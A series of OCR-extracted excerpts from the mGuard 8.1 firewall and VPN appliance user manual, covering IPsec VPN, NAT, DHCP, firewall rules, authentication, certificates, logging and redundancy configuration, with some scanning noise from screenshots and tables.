187. data packets are considered which Are actually encrypted by the mGuard the mGuard only forwards packets via the VPN tunnel if they originate from a trustworthy source Originate from a source address within the network which is defined here Have their destination address in the network of the part ner if 1 1 NAT is not set for the partner NAT Only one IP address subnet mask 32 is permitted as the VPN network for this setting The network to be masqueraded is translated to this IP address The data packets are then transmitted via the VPN tunnel Masquerading changes the source address and source port The original addresses are recorded in an entry in the Conn track table Where response packets are received via the VPN tunnel and there is a matching entry in the Conntrack table these packets have their destination address and destination port written back to them 264 Innominate Security Technologies 105661_en_02 IPsec VPN menu IPsec VPN gt gt Connections gt gt Edit gt gt General Remote Here specify the address of the network or computer which is located downstream of the remote VPN gateway Type Tunnel Remote 1 1 NAT mee toai Remote Tunnel 192 168 1 1 32 192 168 254 1 32 1 1 NAT 1 1 NAT 192 168 2 1 With 1 1 NAT the IP addresses of devices of the tunnel part ner are exchanged so that each individual address is trans lated into another specific address It i
188. ddress is dis played as the Physical Address Linux e Call sbin ifconfig or ip link show in a shell The following options are available Client computer MAC address without spaces or hy phens Client s IP Address Client IP Address The static IP address of the computer to be assigned to the MAC address Static assignments take priority over the dynamic IP address pool Static assignments must not overlap with the dy namic IP address pool Do not use one IP address in multiple static as signmenits otherwise this IP address will be as signed to multiple MAC addresses Only one DHCP server should be used per sub network Current Leases The current IP addresses leases for the internal and external DHCP servers assigned by the DHCP server are displayed with MAC address IP address and timeout 105661_en_02 Innominate Security Technologies 165 mGuard 8 1 Network gt gt DHCP gt gt Internal DHCP DHCP mode Relay lf DHCP mode is set to Relay the corresponding setting options are displayed below as follows Network DHCP Internal DHCP External DHCP Mode DHCP mode Relay v DHCP Relay Options ONC Servers 10 A Append Relay Agent No Information Option 82 v DHCP Relay Options In mGuard Stealth mode Relay DHCP mode is not supported If the mGuard is in Stealth mode and Relay DHCP mode is selected this setting will be ignored However DHCP requests f
189. de Only mGuard rs4000 3G mGuard rs4000 mGuard centerport mGuard industrial rs mGuard blade mGuard delta mGuard delta EAGLE mGuard Network Interfaces General Dial out Dial in Modem Console Network Status External IP address 10 0 0 152 Active Defaultroute via 10 0 0 253 Used DNS servers DNS Root Servers Internal modem Offline Network Mode Network Mode Router w Router Mode Built in mobile network modem w Network gt gt Interfaces gt gt General Router network mode Modem router mode Modem Built in Modem Built in mobile net Modem network mode is available for mGuard rs4000 rs2000 work modem mGuard centerport mGuard industrial rs nGuard blade EAGLE mGuard mGuard delta The Built in Modem network mode is also available for the m Quard industrial rs if it has a built in modem or a built in ISDN terminal adapter optional The Built in mobile network modem is also available for the m Guard rs4000 3G and mGuard rs2000 3G For all of the devices mentioned above data traffic is routed via the serial interface and not via the mGuard WAN port when in Modem or Built in mobile network Modem net work mode and from there it continues as follows A data traffic is routed via the externally accessible serial interface serial port to which an external modem must be connected B data traffic is routed via the built in mobile network modem built in ISDN terminal adapter if available
190. de 01 is replaced Manual v Delete configuration backup of Blade 01 Upload S m E IETT Download configuration to Download 10 chent client Blade Control gt gt Blade xx gt gt Configuration Configuration Configuration backup Automatic the new configuration is stored automatically The status of the stored config ae _ gt Control ei a shortly after a configuration change on uration is displayed for each er Sate ane blade Manual the configuration can be stored on the controller 7 i by clicking on Backup o Coni uration S Click on Restore to transfer the configuration stored on Out of date the controller to the mGuard Up to date If the blade was reconfigured after a manual con File copy in progress figuration backup but the new configuration was not saved the configuration stored on the control Blade change detected ler is out of date This is indicated on the Configu No blade available ration tab page by Configuration Obsolete Configuration upload to This indicates that something has been over Blade d initiated Config looked in this case you must backup the configu uration upload to Blade d ration on the controller failed Configuration download from Blade d initi Reconfiguration if After replacing an mGuard in this slot the configuration stored ated Configuration down mGuard blade is on the controller is automatically transferred to the new dev
191. de Active Inactive Disabled Determines the output state of the firewall rule record following a reconfiguration or restart The Active Inactive setting is only applicable if a push button is connected In case the firewall rule records are controlled via a switch or VPN connection they have priority If set to Disabled the firewall rule record cannot be dynami cally activated The firewall rule record is retained but has no influence Control Service input CMD 1 3 VPN connection The firewall rule record can be switched via a push but ton switch or a VPN connection The push button switch must be connected to one of the ser vice contacts CMD 1 3 State Indicates the current state Name The firewall rule record can be freely named renamed Action Activate Deactivate If set to Deactivate the rule record is deactivated Edit The following tab page appears when you click on Edit Network Security Packet Filter Rule Record Regel 1 Rule Record General A descriptive name forthe set Regel 1 Intialmode lt Actve Controlling service input CMO or WPN None connection Token for text message trigger Deactivation Timeout 0 Seconds 212 Innominate Security Technologies 105661_en_02 Network Security menu Network Security gt gt Packet Filter gt gt Rule Records General A descriptive name for The firewall rule record can be freely named renamed the set Initial mode
192. dem Default d dATH OK Consult the modem user manual for the initialization sequence for this modem The initialization sequence is a sequence of character strings expected by the modem and commands that are then sent to the modem so that the modem can establish a con nection Innominate Security Technologies 141 mGuard 8 1 The preset initialization sequence has the following meaning two simple quotation marks The empty character string inside the quotation marks means that the mGuard does not placed directly after one an initially expect any information from the connected modem but instead sends the follow other ing text directly to the modem d dATH The mGuard sends this character string to the modem in order to determine whether the modem is ready to accept commands OK Specifies that the mGuard expects the OK character string from the modem as a re sponse to d dATH On many modem models it is possible to save modem default settings to the modem it self However this option should not be used Initialization sequences should be configured externally instead i e on the mGuard In the event of a modem fault the modem can then be replaced quickly and smoothly with out changing the modem default settings If the external modem is to be used for incoming calls without the modem default settings being entered accordingly then you have to inform the modem that it should accept in coming calls a
193. den from the destination of the data flow In particu lar the destination does not require any routes in order to re spond in a data flow of this type not even a default route default gateway Set the firewall in order for the desired connections to be allowed For incom ing and outgoing rules the source address must still correspond to the origi nal sender if the firewall rules are used Please observe the outgoing rules when using the External External 2 Any External settings see Outgoing rules on page 208 Please observe the incoming rules when using the Internal setting see In coming rules on page 206 From IP 0 0 0 0 0 means that all internal IP addresses are subject to the NAT procedure To specify an address area use CIDR for mat see CIDR Classless Inter Domain Routing on page 24 Comment Can be filled with appropriate comments Lists the rules established for 1 1 NAT Network Address Translation With 1 1 NAT the sender IP addresses are exchanged so that each individual address is exchanged with another specific address and is not exchanged with the same address for all data packets as in IP masquerading This enables the mGuard to mirror addresses from the internal network to the external network The mGuard is connected to network 192 168 0 0 24 via its LAN port and to network 10 0 0 0 24 via its WAN port By using 1 1 NAT the LAN computer with IP address 192 168 0 8 can
194. der User defined name servers The IP addresses of domain name servers can be entered in this list The mGuard uses this list for communication via the secondary external interface as long as the interface is acti vated temporarily and User defined is specified under DNS Mode see above in this case 105661_en_02 Network menu Network Mode Router Default setting mGuard rs4000 rs2000 3G mGuard centerport mGuard delta m Guard blade controller Network Interfaces General Dialout Dial in Modem Console Ls Network Status External IP address 10 0 0 152 Active Defaultroute via 10 0 0 253 Used DNS servers DNS Root Servers Internal modem Offline Network Mode Network Mode Router v Router Mode static v External Networks Exwemairs O a e T ee ig ye 10 0 0 152 255 255 255 0 No v 1 Adtonal Externe Routes I e e IP of default gateway 10 0 0 253 Internal Networks When Router is se memas O 7 a lected as the network orumiodport ipx ye 192 168 1 1 255 255 255 0 No v 1 ee Aton ern Roves gt T r lected as the Router mode see Page 125 DMZ Networks O02 e emas TTT nenw a Saan Secondary External Interface Network Mode Off v Network gt gt Interfaces gt gt General Router network mode Internal Networks Internal IPs trusted The internal IP is the IP address via which the mGuard can be port accessed by devices in the locally connected network The default settings in Router PP
195. dministrator Pass Grants the rights required for the configuration options ac word Account cessed via the web based administrator interface admin User name cannot be modified admin Default password mGuard 105661_en_02 Innominate Security Technologies 181 mGuard 8 1 Authentication gt gt Administrative Users gt gt Passwords user Disable VPN until the If a user password has been specified and activated the user user is authenticated must always enter this password after an mGuard restart in via HTTP order to enable mGuard VPN connections when attempting to access any HTTP URL To use this option specify the new user password in the cor responding entry field This option is set to No by default If set to Yes VPN connections can only be used once a user has logged into the mGuard via HTTP As long as authentication is required all HTTP connections are redirected to the mGuard Changes to this option only take effect after the next restart User Password There is no default user password To set one enter the de sired password in both entry fields 182 Innominate Security Technologies 105661_en_02 Authentication menu 7 1 2 RADIUS Filters Authentication Administrative Users Passwords RADIUS Filters RADIUS Filters for Administrative Access x Group Filter ID Authorized for access as mGuard admin admin v p mGuard audit audit v Group names can be created here
196. e CA Certificates on page 199 and must also be referenced during the configuration of the relevant application SSH HTTPS and VPN Whether both methods are used alternatively or in combination varies depending on the ap plication VPN SSH and HTTPS Restrictions using the Sa fari browser l 37 a Please note that during administrative access to the mGuard via an X 509 certificate using the Safari browser all sub CA certificates must be installed in the browser s truststore 192 Innominate Security Technologies 105661_en_02 105661_en_02 Authentication menu Authentication for SSH The partner shows the Certificate Specific to individ Certificate specific to indi following ual signed by CA vidual self signed The mGuard authenti cates the partner using All CA certificates that form Remote certificate the chain to the root CA certif icate together with the certifi cate shown by the partner PLUS if required Remote certificates if used as a filter l See Management gt gt System Settings on page 33 Shell Access on page 40 Authentication for HTTPS The partner shows the Certificate specific to individ Certificate specific to indi following ual signed by CA vidual self signed The mGuard authenti cates the partner using All CA certificates that form Remote certificate the chain to the root CA certif icate together with the certifi cate
197. e OEM Name OEM Serial Number Serial Number Flash ID Hardware Version Version Parameterset Version of the bootloader Version of the rescue system Current root filesystem Innominate mGuard rs2000 e300c3 mpc83xx 1 0 330 MHz 34 5 C 4 min 126532 kB 00 0c be 04 10 3a 00 0c be 04 10 3b 00 0c be 04 10 3c 00 0c be 04 10 3d mGuard rs2000 TX TX Innominate 2030749866 2030749866 N205d28323633151c1aa2d7cdc9cceae3e5 00003200 4 BootLoader 2 3 5 default MGUARD2 Rescue 1 8 1 default rootfs2 15 2 2 Snapshot This function is used for support purposes Support Advanced Hardware Snapshot Support Snapshot This will create a snapshot of the mGuard for support purposes Support menu It creates a compressed file in tar gz format containing all active configuration settings and log entries that could be relevant for error diagnostics This file does not contain any private information such as private machine certificates or passwords However any pre shared keys of VPN connections are contained in the snapshots To create a snapshot proceed as follows e Click on Download e Save the file under the name snapshot tar gz Provide the file to the support team of your dealer if required Innominate Security Technologies 329 mGuard 8 1 330 Innominate Security Technologies 105661_en_02 Redundancy 16 Redundancy 105661_en_02 The firewall and VPN redu
198. e fault gateway if you want to use VPN connections see Page 115 Alternatively you can select a different stealth configuration than the multiple clients configuration or use another network mode In order to successfully establish an IPsec connection the VPN partner must support IPsec with the following configuration Authentication via pre shared key PSK or X 509 certificates ESP Diffie Hellman group 2 or 5 DES 3DES or AES encryption MD5 SHA 1 or SHA 2 hash algorithms Tunnel or transport mode Quick mode Main mode SAlifetime 1 second to 24 hours lf the partner is a computer running Windows 2000 the Microsoft Windows 2000 High Encryption Pack or at least Service Pack 2 must be installed If the partner is positioned downstream of a NAT router the partner must support NAT T Alternatively the NAT router must know the IPsec protocol IPSsec VPN passthrough For technical reasons only IPsec tunnel connections are supported in both cases 105661_en_02 Example 105661_en_02 IPsec VPN menu 10 2 1 Connections Lists all the VPN connections that have been defined Each connection name listed here can refer to an individual VPN connection or a group of VPN connection channels You have the option of defining several tunnels under the trans port and or tunnel settings of the relevant entry You also have the option of defining new VPN connections activating and deactivat
199. e mGuard should adopt in order to authenticate the partner browser of the remote user The remote certificate can be selected from the selection list The selection list contains the remote certificates that have been loaded on the mGuard under the Authentication gt gt Cer tificates menu item root admin netadmin audit user Specifies which user or administrator rights are granted to the remote user For a description of the root admin and user authorization levels see Authentication gt gt Administrative Users on page 181 The netadmin and audit authorization levels relate to access rights with the mGuard device manager 105661_en_02 Management menu 4 3 Management gt gt Licensing You can obtain additional optional licenses from you authorized mGuard dealer 4 3 1 Overview Management Licensing Overview Install Terms of License mGuard Flash ID U3DDD33F38 0B67 1A85 8E4B 0274BDA00853 0568 Feature License License with priority 1279215535 licence_id 0 licence_date 2010 07 15117 38 55 flash_id U3DDD33F8 0B67 1A85 8E4B 027ABDA00853 serial_number 1A715030 hardware_revision 00002001 product_code BD 970010 pxc_product_code BD 970010 With mGuard Version 5 0 or later licenses remain installed even after the firmware is flashed However licenses are still deleted when devices with older firmware versions are flashed to Version 5 0 0 or later Before flashing the license for usin
200. e the mGuard devices support forwarding of special UDP TCP ports from a virtual IP address to other IP addresses provided the other IP addresses can be reached by the mGuard In addition the mGuard also masks data with virtual IP addresses when masquerading rules are set up State monitoring State monitoring is used to determine whether the mGuard is active on standby or has an error Each mGuard determines its own state independently based on the information pro vided by other components State monitoring ensures that two mGuard devices are not ac tive at the same time Status indicator The status indicator contains detailed information on the firewall redundancy state A sum mary of the state can be called up using the Redundancy gt gt Firewall Redundancy gt gt Re dundancy or Redundancy gt gt Firewall Redundancy gt gt Connectivity Checks menus 105661_en_02 Innominate Security Technologies 333 mGuard 8 1 16 1 2 Interaction of the firewall redundancy components During operation the components work together as follows both mGuard devices perform ongoing connectivity checks for both of their network interfaces internal and external In addition an ongoing availability check is performed Each mGuard listens continuously for presence notifications CARP and the active mGuard also sends them Based on the information from the connectivity and availability checks the state monitoring function is made aware of the
201. e 1 1 NAT address or the actual ad dress Outgoing From IP the 1 1 NAT address or the actual ad dress TolP the IP address in the VPN tunnel 105661_en_02 Innominate Security Technologies 2 7 mGuard 8 1 IPsec VPN gt gt Connections gt gt Edit gt gt Firewall From Port To Port Only evaluated for TCP and UDP protocols any refers to any port startport endport e g 110 120 refers to a port area Individual ports can be specified using the port number or the corresponding service name e g 110 for pop3 or pops for 110 Action Accept means that the data packets may pass through Reject means that the data packets are sent back and the sender is informed of their rejection In Stealth mode Reject has the same effect as Drop Drop means that the data packets are not permitted to pass through They are discarded which means that the sender is not informed of their whereabouts Comment Freely selectable comment for this rule Log For each individual firewall rule you can specify whether the use of the rule Should be logged set Log to Yes Should not be logged set Log to No default settings Log entries for When set to Yes all connection attempts that are not covered unknown connection by the rules defined above are logged attempts Outgoing The explanation provided under Incoming also applies to Outgoing 278 Innominate Security Technologies 105661_en_02
202. e Certificate below e Install the remote certificate under Remote Certificate see Installing the remote certif icate on page 271 It is not possible to reference a remote certificate loaded under the Authentication gt gt Cer tificates menu item If the VPN partner authenticates itself with a machine certificate signed by a CA It is possible to authenticate the machine certificate shown by the partner as follows Using CA certificates Using the corresponding remote certificate Authentication using a CA certificate Only the CA certificate from the CA that signed the certificate shown by the VPN partner should be referenced here selection from list The additional CA certificates that form the chain to the root CA certificate together with the certificate shown by the partner must be in stalled on the mGuard under the Authentication gt gt Certificates menu item The selection list contains all CA certificates that have been loaded on the mGuard under the Authentication gt gt Certificates menu item The other option is Signed by any trusted CA With this setting all VPN partners are accepted providing that they log in with a signed CA certificate issued by a recognized certification authority CA The CA is recognized if the relevant CA certificate and all other CA certificates have been loaded on the mGuard These then form the chain to the root certificate together with the certificates shown
203. e LAN port the WAN port is also disabled enabled External if the connection is lost established on the WAN port the LAN port is also disabled enabled 320 Innominate Security Technologies 105661_en_02 Logging menu 14 Logging menu Logging gt gt Settings Remote Logging 105661_en_02 Logging refers to the recording of event messages e g regarding settings that have been made the application of firewall rules errors etc Log entries are recorded in various categories and can be sorted and displayed according to these categories see Logging gt gt Browse local logs on page 323 14 1 Logging gt gt Settings 14 1 1 Settings All log entries are recorded in the RAM of the mGuard by default Once the maximum mem ory space for log entries has been used up the oldest log entries are automatically overwrit ten by new entries In addition all log entries are deleted when the mGuard is switched off To prevent this log entries SysLog messages can be transmitted to an external computer SysLog server This is particularly useful if you wish to manage the logs of multiple mGuard devices centrally Logging Settings Settings Remote Logging Activate remote UDP logging No Log Server IF address 192 168 1 254 Log Server port normally 514 514 Verbose Logging Verbose modem logging No Verbose mobile network E No Y logging Activate remote UDP Yes No logging If you want all log ent
204. e are required for each session The root user has unrestricted access In the case of administrative access via another user admin netadmin and audit the number of simultaneous sessions is restricted You can specify the number here The netadmin and audit authorization levels relate to access rights with the mGuard device manager The restriction does not affect existing sessions it only affects newly established access instances Maximum number of concurrent sessions for role admin Maximum number of concurrent sessions 2 to 2147483647 At least two simultaneously permitted sessions are required for admin to prevent it from having its access blocked O to 2147483647 When 0 is set no session is permitted The netadmin user for role netadmin l is not necessarily used Maximum number of O to 2147483647 concurrent sessions i oe When 0 is set no session is permitted The audit user is not for role audit necessarily used Allowed Networks s TY La a 1 10 1 0 0 16 External v Accept v No v p 2 192 168 67 0 24 External w Accept v No v 105661_en_02 Innominate Security Technologies 43 mGuard 8 1 Management gt gt System Settings gt gt Shell Access Lists the firewall rules that have been set up These apply for incoming data packets of an SSH remote access attempt If multiple firewall rules are defined these are queried starting from the top
205. e chosen e A name must be assigned whether it is the suggested one or another Names must be unique and must not be assigned more than once Innominate Security Technologies 201 mGuard 8 1 Using the short name During the configuration of SSH Management gt gt System Settings Shell Access menu HTTPS Management gt gt Web Settings Access menu the certificates imported on the mGuard are provided in a selection list The certificates are displayed under the short name specified for each certificate in this selection list Name as signment is mandatory Creating a certificate copy A copy can be created from the imported remote certificate To do this proceed as follows e Click on Current Certificate File next to the Download Certificate row for the relevant re mote certificate A dialog box opens in which you can enter the required information 202 Innominate Security Technologies 105661_en_02 Authentication menu 7 4 5 CRL Authentication Certificates Certificate settings Machine Certificates CA Certificates Remote Certificates CRL CRL gt x Issuer Last Update Next Update URL Download via VPN if No wv applicable Upload Authentication gt gt Certificates gt gt CRL CRL CRL stands for certificate revocation list The CRL is a list containing serial numbers of blocked certificates This page is used for the configuration of sites from which the mGuard should download
206. e is filled and updated constantly by the forwarded network packets It is protected against un authorized access The data is transmitted through the physical LAN interface and never through the virtual network interface To keep internal data traffic to a minimum a VLAN can be configured to store the synchro nization data in a separate multicast and broadcast domain Virtual IP addresses Each mGuard is configured with virtual IP addresses The number of virtual IP addresses depends on the network mode used Both mGuard devices in a redundant pair must be as signed the same virtual IP addresses The virtual IP addresses are required by the mGuard to establish virtual network interfaces Two virtual IP addresses are required in Router network mode while others can be created One virtual IP address is required for the external network interface and the other for the in ternal network interface These IP addresses are used as a gateway for routing devices located in the external or in ternal LAN In this way the devices can benefit from the high availability resulting from the use of both redundant mGuard devices The redundant pair automatically defines MAC addresses for the virtual network interface These MAC addresses are identical for the redundant pair In Router network mode both mGuard devices share a MAC address for the virtual network interface connected to the ex ternal and internal Ethernet segment In Router network mod
207. e notifications CARP but shorter than the upper limit of the fail over switching time Loss of presence notifications CARP during transmission A one off loss of presence notifications CARP is tolerated by the mGuard but it does not tolerate the loss of subsequent presence notifications CARP This applies to the availabil ity check on each individual network interface even when these are checked simultane ously It is therefore very unlikely that the availability check will fail as a result of a very brief network interruption Loss of ICMP echo requests replies during transmission ICMP echo requests or replies are important for the connectivity check Losses are always observed but are tolerated under certain circumstances The following measures can be used to increase the tolerance level on ICMP echo re quests Select at least one target must respond under Kind of check in the Redundancy gt gt Firewall Redundancy gt gt Connectivity Checks menu Also define a secondary set of targets here The tolerance level for the loss of ICMP echo requests can be further increased by entering the targets of unreliable connec tions under both sets primary and secondary or listing them several times within a set 105661_en_02 Innominate Security Technologies 339 mGuard 8 1 Restoring the primary mGuard following a failure lf a redundant pair is defined with different priorities the secondary mGuard becomes active if
208. e of the egress queue to which traffic should be assigned Comment Optional comment text 304 Innominate Security Technologies 105661_en_02 Redundancy menu 13 Redundancy menu a Redundancy is described in detail in Section 16 Redundancy a To use the redundancy function both mGuards must have the same firmware 13 1 Redundancy gt gt Firewall Redundancy a This menu is not available on the mGuard rs2000 and mGuard rs2000 3G 13 1 1 Redundancy Redundancy Firewall Redundancy General Redundancy state faulty The mGuard does not yet have proper connectivity or cannot determine it for sure Enable redundancy Yes Faikower switching time 3 second s Latency before faihower 0 miliseconds Priority of this device high Passphrase for availability checks passwd a Virtual interface Virtual router ID 51 Enable virtualIP No DEEN F F 10 0 0 100 Management P adaresses of 2nd SS devi ze F F 10 0 0 1 Encrypted state synchronisation Encrypt the state messages Yes w Passphrase 10onG paSsWord with Much 3n trpoy Encryption Algorithm 3DES Hash Algorithm SHA 1 r 105661_en_02 Innominate Security Technologies 305 mGuard 8 1 Redundancy gt gt Firewall Redundancy gt gt Redundancy General 306 Innominate Security Technologies Redundancy state Enable redundancy Fail over switching time Waiting time prior to switching Priority of this device Shows the current sta
209. econfigured individually it may be the case that the mGuard on standby has an obsolete machine certificate for a brief period If the mGuard on standby becomes active at the exact moment when the ISAKMP SAs are being established this procedure cannot be continued with an obsolete machine certificate As acountermeasure VPN state synchronization replicates the machine certificate from the active mGuard to the mGuard on standby In the event of a fail over the mGuard on standby will only use this to complete the process of establishing the ISAKMP SAs where this has already been started If the mGuard on standby establishes new ISAKMP SAs after a fail over it uses the ma chine certificate that has already been configured Innominate Security Technologies 349 mGuard 8 1 VPN state synchronization therefore ensures that the currently used machine certificates are replicated However it does not replicate the configuration itself The mGuard on standby has an obsolete Pre Shared Key PSK Pre Shared Keys PSK also need to be renewed on occasion in order to authenticate VPN partners The redundant mGuard devices may then have a different PSK for a brief period In this case only one of the mGuard devices can establish a VPN connection as most VPN partners only accept one PSK The mGuard does not offer any countermeasures for this a We therefore recommend using X 509 certificates instead of PSKs If VPN state synchronization replicat
210. ed as the default queue in this se lection list The assignment of specific data traffic to an egress queue is based on a list of criteria If the criteria in a row apply to a data packet it is assigned to the egress queue specified in the row Example for audio data to be transmitted you have defined a queue with guaranteed bandwidth and priority under Egress Queues see Page 296 under the name Urgent You then de fine the rules here for how audio data is detected and specify that this data should belong to the Urgent queue All TCP UDP ICMP ESP Protocol s relating to the rule IP address of the network or device from which the data origi nates 0 0 0 0 0 means all IP addresses To specify an address area use CIDR format see CIDR Classless Inter Domain Rout ing on page 24 Assign the traffic from this source to the queue selected under Queue Name in this row Port used at the source from which data originates only eval uated for TCP and UDP protocols any refers to any port gstartport endport e g 110 120 refers to a port area Individual ports can be specified using the port number or the corresponding service name e g 110 for pop3 or pops for 110 IP address of the network or device to which the data is sent Entries correspond to From IP as described above Port used at the source where the data is sent Entries corre spond to From Port as described above Innominate Security Te
211. ed interface An ICMP echo reply cannot be received by an external in terface when the target is connected to the internal interface and vice versa When the static routes are changed it is easy to forget to adjust the configuration of the targets ac cordingly The targets for the connectivity check should be well thought out Without a connectivity check all it takes are two errors for a network lobotomy to occur A network lobotomy is prevented if the targets for both mGuard devices are identical and all targets have to answer the request However the disadvantage of this method is that the connectivity check fails more often if one of the targets does not offer high availability In Router network mode we recommend defining a highly available device as the target on the external interface This can be the default gateway for the redundant pair e g a vir tual router comprised of two independent devices In this case either no targets or a selec tion of targets should be defined on the internal interface Please also note the following information when using a virtual router consisting of two in dependent devices as the default gateway for a redundant pair If these devices use VRRP to synchronize their virtual IP then a network lobotomy could split the virtual IP of this router into two identical copies These routers could use a dynamic routing protocol and only one may be selected for the data flows of the network being monitored
212. ed to check whether a file has been changed SHA 256 is more secure than SHA 1 but it takes longer to process 236 Innominate Security Technologies 105661_en_02 CIFS Integrity Monitoring menu CIFS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Settings gt gt Edit gt gt Checked Share To be stored on CIFS share Basename of the checksum files May be prefixed with a directory In order to perform the check the mGuard must be provided with a network drive for storing the files The checksum memory can be accessed via the external net work interface The same network drive can be used as the checksum mem ory for several different drives to be checked The base name of the checksum files must then be clearly selected in this case The mGuard recognizes which version the checksum files on the network drive must have For example if itis necessary to restore the contents of the network drive from a backup following a malfunction old checksum files are provided in this case and the mGuard would detect the deviations In this case the integrity data base must be recreated see C FS Integrity Monitoring gt gt CIFS Integrity Checking gt gt Settings gt gt Edit gt gt Management Possible Actions The checksum files are stored on the network drive specified above They can also be stored in a separate directory The di rectory name must not start with a backslash Example Checks
213. ed to set up a connection to the re quired partner which could be any site on the Internet Every host or router on the Internet Intranet has its own unique IP address IP Internet Pro tocol An IP address is 32 bits 4 bytes long and is written as four numbers each between 0 and 255 which are separated by a dot An IP address consists of two parts the network address and the host address Network address Host address All network hosts have the same network address but different host addresses The two parts of the address differ in length depending on the size of the respective network net works are categorized as Class A B or 1st byte 2nd byte 3rd byte 4th byte Class A Network Host address address Class B Network address Host address Class C Network address Host ad dress Innominate Security Technologies 359 mGuard 8 1 IPsec Subject certificate The first byte of the IP address determines whether the IP address of a network device be longs to Class A B or C The following is specified Value of byte 1 Bytes for the network Bytes for the host address address Class A 1 126 1 3 Class B 128 191 2 2 Class C 192 223 3 1 Based on the above figures the number of Class A networks worldwide is limited to 126 Each of these networks can have a maximum of 256 x 256 x 256 hosts 3 bytes of address area There can be 64 x 256 Class B networks and each of these networks can have up to 65 536 hosts
214. eeeesaeeeees 334 16 145 Fall OVErSWITCHING UME sexceecacssieiesnctacistcuebibscvsseaRocresueai e a 335 16 1 6 Error compensation through firewall redundancy cceecee 337 16 1 7 Handling firewall redundancy in extreme situations ceeee 338 16 1 8 Interaction with other devices ccccceccecseeeeeeeeeeeeeeeeseeeeeseeeeeseneeeesees 340 16 1 9 Transmission capacity with firewall redundancy cccccsseeeeeeeeeees 343 16 1 10 Limits of firewall redundancy cccceecececssseeeeeeeeeeeeeeaeeeeeaaeeesessenees 344 162 VIPINSFOQUACAING srete a a uence naam erocuiad 345 16 2 1 Components in VPN redundancy ccccseeeceeesseeeeeseeseeeceaaeeeeesnaeeess 345 16 2 2 Interaction of the VPN redundancy component ccc ssseeeesseeeees 346 16 2 3 Error compensation through VPN redundancy ccccseeeeeeeeeeeeees 346 16 2 4 Setting the variables for VPN redundancy ccccsseeeeceeeeeeeeeaeeees 347 16 2 5 Requirements for VPN redundancy ccccseeeeeecesseeeceseeeeeesaeeees 348 16 2 6 Handling VPN redundancy in extreme situations cere 348 16 2 7 Interaction with other devices ccccecccsseseeeseeetsecesseseeseeeeeseeseeseaes 350 16 2 8 Transmission capacity with VPN redundancy c cccccseeeeeeeeeeneees 352 16 2 9 Limits of VPN redundancy ccccccseeeeeeeeeeeeeceseeeeseeeeeeseaaeeeessaaeeees 353 MZ CO
215. efault firewall settings All incoming connections are rejected excluding VPN Data packets of all outgoing connections are allowed through The firewall rules here have an effect on the firewall that is permanently active with the ex ception of VPN connections Individual firewall rules are defined for VPN connections see IP sec VPN gt gt Connections on page 254 Firewall on page 276 User firewall When a user logs in for whom user firewall rules are defined these rules take priority see Network Security gt gt User Firewall on page 225 followed by the per manently active firewall rules If multiple firewall rules are defined these are queried starting from the top of the list of entries until an appropriate rule is found This rule is then applied If the list of rules contains further subsequent rules that could also apply these rules are ignored 105661_en_02 Innominate Security Technologies 205 mGuard 8 1 8 1 1 Incoming rules Incoming Rules Outgoing Rules DMZ Rule Records MAC Filtering Advanced C Incoming General firewall setting Use the firewall ruleset below Accept all incoming connections Drop all incoming connections gt X no ot ne ons F 4 External TCP OME eo Log ID fw incoming M 3391ddd8 f26e 1a20 a50e 000cbe00052e O e O Topot Action Comment Loo 0 0 0 0 0 any Accept v Yes v F 2 External2 T
216. emote access Remote SEC Stick TCP Port Delay between requests for a sign of life The value 0 indicates that these messages will not be sent Maximum number of missing signs of life Allow SEC Stick forwarding into VPN tunnel Concurrent Session Limits Maximum number of cumulative concurrent sessions for all users Maximum number of concurrent sessions forone 2 user Allowed Networks Log ID tw secstick socess fY7 00000000 0000 0000 0000 000000000000 Etro ttersce YP Acton comment Log p 0 0 0 0 0 External v Accept v No v These rules allow to enable SEC Stick remote access Note In Stealth mode incoming traffic on the given port is no longer forwarded to the client Note In router mode with NAT or portforwarding the port set here has priority over portforwarding Note The SEC Stick access from the internal side and via dial in is enabled by default and can be restricted by firewall rules SEC Stick gt gt Global gt gt Access SEC Stick Access mee ononincliced i Access via the SEC Stick requires a license This access function can only be used if the corresponding license has been purchased and installed in the scope of functions for the mGuard rs2000 3G mGuard rs2000 Enable SEC Stick ser Setthis option to Yes to specify that the SEC Stick being used vice at a remote location or its owner is able to log in In this case SEC Stick remote access must also be enabled next option Enab
217. emporarily as a secondary external interface It supports dedicated routes and DNS configuration 105661_en_02 Innominate Security Technologies 117 mGuard 8 1 Network gt gt Interfaces gt gt General Stealth network mode Operation Mode Secondary External Interface permanent temporary After selecting Modem or Built in Modem network mode for the secondary external interface the operating mode of the secondary external interface must be specified Network Mode Built in mobile network modem w Operation Mode permanent w Secondary Eemal Routes P gt X F 192 168 3 0 24 gateway permanent Secondary External Routes 118 Innominate Security Technologies Data packets whose destination corresponds to the routing settings specified for the secondary external interface are al ways routed via this external interface The secondary exter nal interface is always activated temporary Data packets whose destination corresponds to the routing settings specified for the secondary external interface are only routed via this external interface when additional separately defined conditions are met Only then is the secondary exter nal interface activated and the routing settings for the second ary external interface take effect see Probes for activation on page 120 Network Specify the routing to the external network here Multiple routes can be specified Data packets intended for these net works a
218. en two computers and use them simultaneously Certain port numbers are reserved for specific purposes For example HTTP connections are usually assigned to TCP port 80 and POPS connections to TCP port 110 A proxy is an intermediary service A web proxy e g Squid is often connected upstream of a large network For example if 100 employees access a certain website frequently over a web proxy then the proxy only loads the relevant web pages from the server once and then distributes them as needed among the employees Remote web traffic is reduced which saves money 362 Innominate Security Technologies 105661_en_02 PPPoE PPTP Router Trap X 509 certificate 105661_en_02 Glossary Acronym for Point to Point Protocol over Ethernet A protocol based on the PPP and Ether net standards PPPoE is a specification defining how to connect users to the Internet via Ethernet using a shared broadband medium such as DSL wireless LAN or a cable modem Acronym for Point to Point Tunneling Protocol This protocol was developed by Microsoft and U S Robotics among others for secure data transfer between two VPN nodes VPN via a public network A router is a device that is connected to different IP networks and communicates between them To do this the router has an interface for each network connected to it A router must find the correct path to the destination for incoming data and define the appropriate interface for forwarding
